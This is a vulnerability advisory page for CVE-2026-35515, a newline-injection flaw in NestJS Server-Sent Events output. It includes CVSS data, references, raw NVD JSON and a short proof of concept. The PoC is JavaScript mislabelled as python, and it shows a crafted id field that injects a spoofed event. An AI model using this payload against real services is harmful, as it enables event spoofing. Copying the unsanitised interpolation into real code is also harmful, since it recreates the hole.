CVE-2026-35515

Description

Nest is a framework for building scalable Node.js server-side applications. Prior to 11.1.18, SseStream._transform() interpolates message.type and message.id directly into Server-Sent Events text protocol output without sanitizing newline characters (\r, \n). Since the SSE protocol treats both \r and \n as field delimiters and \n\n as event boundaries, an attacker who can influence these fields through upstream data sources can inject arbitrary SSE events, spoof event types, and corrupt reconnection state. This vulnerability is fixed in 11.1.18.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:nestjs:nest:*:*:*:*:*:node.js:*:* - VULNERABLE

Nest < 11.1.18

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Vulnerable Concept in NestJS < 11.1.18
// This PoC demonstrates how injecting newlines in the 'id' field splits the SSE event.

const mockSseStream = {
  _transform(message, encoding, callback) {
    // Vulnerable logic: direct interpolation without sanitization
    const type = message.type || 'message';
    const id = message.id || '';
    const data = message.data;

    // Constructing the SSE payload
    // If id contains '\nevent: fake\ndata: pwned\n\n', it breaks the protocol
    let payload = `id: ${id}\nevent: ${type}\ndata: ${data}\n\n`;

    this.push(payload);
    callback();
  }
};

// Exploit Payload Simulation
const maliciousPayload = {
  id: 'legitimate-id\nevent: spoofed\ndata: Malicious Data Injected!\n\n',
  type: 'original',
  data: 'Original Data'
};

console.log('--- Output Generated by Vulnerable Stream ---');
mockSseStream._transform(maliciousPayload, null, () => {});
/*
Output:
id: legitimate-id
event: spoofed
data: Malicious Data Injected!

event: original
data: Original Data

The client receives two events: one spoofed and one original.
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35515
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35515
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35515/
[4] VulDB https://vuldb.com/cve/CVE-2026-35515
[5] https://github.com/nestjs/nest/security/advisories/GHSA-36xv-jgw5-4q75

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35515", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:27.773", "lastModified": "2026-04-17T20:36:10.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nest is a framework for building scalable Node.js server-side applications. Prior to 11.1.18, SseStream._transform() interpolates message.type and message.id directly into Server-Sent Events text protocol output without sanitizing newline characters (\\r, \\n). Since the SSE protocol treats both \\r and \\n as field delimiters and \\n\\n as event boundaries, an attacker who can influence these fields through upstream data sources can inject arbitrary SSE events, spoof event types, and corrupt reconnection state. This vulnerability is fixed in 11.1.18."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nestjs:nest:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.1.18", "matchCriteriaId": "56CE7D95-5F6B-4065-B105-4B5C36682291"}]}]}], "references": [{"url": "https://github.com/nestjs/nest/security/advisories/GHSA-36xv-jgw5-4q75", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}